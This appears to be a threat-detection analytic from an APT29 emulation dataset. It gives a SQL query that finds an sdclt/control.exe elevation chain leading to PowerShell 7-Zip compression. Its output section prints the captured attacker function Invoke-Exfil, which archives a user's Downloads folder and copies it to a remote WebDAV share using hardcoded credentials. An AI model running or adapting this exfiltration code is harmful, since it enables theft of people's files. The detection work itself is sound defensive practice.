# 4C19DDB9-9763-4D1C-9B9D-788ECF193778

## Data Sources
* Microsoft-Windows-Sysmon/Operational<br>* Microsoft-Windows-PowerShell/Operational<br>

## Logic

```
SELECT f.ScriptBlockText
FROM apt29Host f
INNER JOIN (
  SELECT d.ProcessId, d.ParentProcessId
  FROM apt29Host d
  INNER JOIN (
    SELECT a.ProcessGuid, a.ParentProcessGuid
    FROM apt29Host a
    INNER JOIN (
      SELECT ProcessGuid
      FROM apt29Host
      WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
          AND EventID = 1
          AND LOWER(Image) LIKE "%control.exe"
          AND LOWER(ParentImage) LIKE "%sdclt.exe"
    ) b
    ON a.ParentProcessGuid = b.ProcessGuid
    WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
      AND a.EventID = 1
      AND a.IntegrityLevel = "High"
  ) c
  ON d.ParentProcessGuid= c.ProcessGuid
  WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
    AND d.EventID = 1
    AND d.Image LIKE '%powershell.exe'
) e
ON f.ExecutionProcessID = e.ProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
    AND f.EventID = 4104
    AND LOWER(f.ScriptBlockText) LIKE "%compress-7zip%"

```

## Output

```
function Invoke-Exfil {

  if (!(Get-Module -Name "7Zip4Powershell")) { Write-Host "[*] Installing 7Zip4Powershell module"; Install-Module -Name 7Zip4Powershell -Force }

  Write-Host "[*] Compressing all the things in download dir"
  Compress-7Zip -Path "$env:USERPROFILE\Downloads\" -Filter * -Password "lolol" -ArchiveFileName "$env:APPDATA\OfficeSupplies.7z"

  $UserName = "cozy"
  $Password = "MyCozyPassw0rd!" | ConvertTo-SecureString -AsPlainText -Force
  $Creds = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $UserName, $Password

  $WebDavShare = "WebDavShare"
  $uri = "\\192.168.0.4\webdav"

  Remove-PSDrive $WebDavShare -Force -ErrorAction SilentlyContinue # Ensure another PSDrive is not occupying the name WebDavShare
  
  Write-Host "[*] Creating a temporary mapped network drive - WebDavShare"
  New-PSDrive -Name $WebDavShare -PSProvider FileSystem -Root $uri -Credential $Creds

  Write-Host "[*] Copying data to WebDavShare"
  Copy-Item "$env:APPDATA\OfficeSupplies.7z" "WebDavShare:\OfficeSupplies.7z" -Force

  Write-Host "[*] Removing temporary network share"
  Remove-PSDrive $WebDavShare -Force -ErrorAction SilentlyContinue

  Invoke-BeachCleanup
}

```
